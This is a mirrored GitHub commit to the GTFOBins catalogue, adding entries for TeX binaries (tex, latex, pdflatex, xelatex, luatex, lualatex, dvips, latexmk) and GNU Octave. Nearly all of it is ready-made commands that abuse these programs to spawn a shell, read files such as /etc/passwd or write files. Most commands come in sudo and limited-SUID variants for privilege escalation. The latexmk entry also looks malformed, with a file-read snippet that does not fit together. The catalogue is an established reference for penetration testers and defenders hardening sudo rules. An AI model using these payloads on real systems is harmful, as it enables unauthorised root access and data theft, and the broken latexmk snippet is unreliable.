mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-10-22 16:48:09 +02:00
Add TeX binaries and GNU Octave
This commit is contained in:
Andrea Cardaci
GitHub
commit
162f586eb8
16
_gtfobins/dvips.md
Normal file
16
_gtfobins/dvips.md
Normal file
@ -0,0 +1,16 @@
|
||||
---
|
||||
description: The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
||||
dvips -R0 texput.dvi
|
||||
sudo:
|
||||
- code: |
|
||||
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
||||
sudo dvips -R0 texput.dvi
|
||||
limited-suid:
|
||||
- code: |
|
||||
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
||||
./dvips -R0 texput.dvi
|
||||
---
|
||||
21
_gtfobins/latex.md
Normal file
21
_gtfobins/latex.md
Normal file
@ -0,0 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||
file-read:
|
||||
- description: The read file will be part of the output.
|
||||
code: |
|
||||
latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||
strings article.dvi
|
||||
sudo:
|
||||
- description: The read file will be part of the output.
|
||||
code: |
|
||||
sudo latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||
strings article.dvi
|
||||
- code: |
|
||||
sudo latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||
limited-suid:
|
||||
- code: |
|
||||
./latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||
---
|
||||
14
_gtfobins/latexmk.tex
Normal file
14
_gtfobins/latexmk.tex
Normal file
@ -0,0 +1,14 @@
|
||||
description: This allows to execute [`perl`](/gtfobins/perl/) code.
|
||||
functions:
|
||||
shell:
|
||||
- code: latexmk -e 'exec "/bin/sh";'
|
||||
- code: latexmk -latex='/bin/sh #' /dev/null
|
||||
file-read:
|
||||
- code: latexmk -e 'open(X,"/etc/passwd");while(<X>){print $_;}exit'
|
||||
- description: The read file will be part of the output.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' >$TF
|
||||
strings tmp.dvi
|
||||
sudo:
|
||||
- code: sudo latexmk -e 'exec "/bin/sh";'
|
||||
10
_gtfobins/lualatex.md
Normal file
10
_gtfobins/lualatex.md
Normal file
@ -0,0 +1,10 @@
|
||||
---
|
||||
description: This allows to execute [`lua`](/gtfobins/lua/) code.
|
||||
functions:
|
||||
shell:
|
||||
- code: lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
|
||||
sudo:
|
||||
- code: sudo lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
|
||||
limited-suid:
|
||||
- code: ./lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
|
||||
---
|
||||
10
_gtfobins/luatex.md
Normal file
10
_gtfobins/luatex.md
Normal file
@ -0,0 +1,10 @@
|
||||
---
|
||||
description: This allows to execute [`lua`](/gtfobins/lua/) code.
|
||||
functions:
|
||||
shell:
|
||||
- code: luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
|
||||
sudo:
|
||||
- code: sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
|
||||
limited-suid:
|
||||
- code: ./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
|
||||
---
|
||||
14
_gtfobins/octave.md
Normal file
14
_gtfobins/octave.md
Normal file
@ -0,0 +1,14 @@
|
||||
---
|
||||
description: The payloads are compatible with GUI.
|
||||
functions:
|
||||
shell:
|
||||
- code: octave-cli --eval 'system("/bin/sh")'
|
||||
file-write:
|
||||
- code: octave-cli --eval 'filename = "file_to_write"; fid = fopen(filename, "w"); fputs(fid, "DATA"); fclose(fid);'
|
||||
file-read:
|
||||
- code: octave-cli --eval 'format none; fid = fopen("file_to_read"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'
|
||||
sudo:
|
||||
- code: sudo octave-cli --eval 'system("/bin/sh")'
|
||||
limited-suid:
|
||||
- code: ./octave-cli --eval 'system("/bin/sh")'
|
||||
---
|
||||
21
_gtfobins/pdflatex.md
Normal file
21
_gtfobins/pdflatex.md
Normal file
@ -0,0 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||
file-read:
|
||||
- description: The read file will be part of the output.
|
||||
code: |
|
||||
pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||
pdftotext article.pdf -
|
||||
sudo:
|
||||
- description: The read file will be part of the output.
|
||||
code: |
|
||||
sudo pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||
pdftotext article.pdf -
|
||||
- code: |
|
||||
sudo pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||
limited-suid:
|
||||
- code: |
|
||||
./pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||
---
|
||||
12
_gtfobins/pdftex.md
Normal file
12
_gtfobins/pdftex.md
Normal file
@ -0,0 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
pdftex --shell-escape '\write18{/bin/sh}\end'
|
||||
sudo:
|
||||
- code: |
|
||||
sudo pdftex --shell-escape '\write18{/bin/sh}\end'
|
||||
limited-suid:
|
||||
- code: |
|
||||
./pdftex --shell-escape '\write18{/bin/sh}\end'
|
||||
---
|
||||
12
_gtfobins/tex.md
Normal file
12
_gtfobins/tex.md
Normal file
@ -0,0 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
tex --shell-escape '\write18{/bin/sh}\end'
|
||||
sudo:
|
||||
- code: |
|
||||
sudo tex --shell-escape '\write18{/bin/sh}\end'
|
||||
limited-suid:
|
||||
- code: |
|
||||
./tex --shell-escape '\write18{/bin/sh}\end'
|
||||
---
|
||||
21
_gtfobins/xelatex.md
Normal file
21
_gtfobins/xelatex.md
Normal file
@ -0,0 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||
file-read:
|
||||
- description: The read file will be part of the output.
|
||||
code: |
|
||||
xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||
strings article.dvi
|
||||
sudo:
|
||||
- description: The read file will be part of the output.
|
||||
code: |
|
||||
sudo xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||
strings article.dvi
|
||||
- code: |
|
||||
sudo xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||
limited-suid:
|
||||
- code: |
|
||||
./xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||
---
|
||||
12
_gtfobins/xetex.md
Normal file
12
_gtfobins/xetex.md
Normal file
@ -0,0 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
xetex --shell-escape '\write18{/bin/sh}\end'
|
||||
sudo:
|
||||
- code: |
|
||||
sudo xetex --shell-escape '\write18{/bin/sh}\end'
|
||||
limited-suid:
|
||||
- code: |
|
||||
./xetex --shell-escape '\write18{/bin/sh}\end'
|
||||
---
|
||||
Loading…
Reference in New Issue
Block a user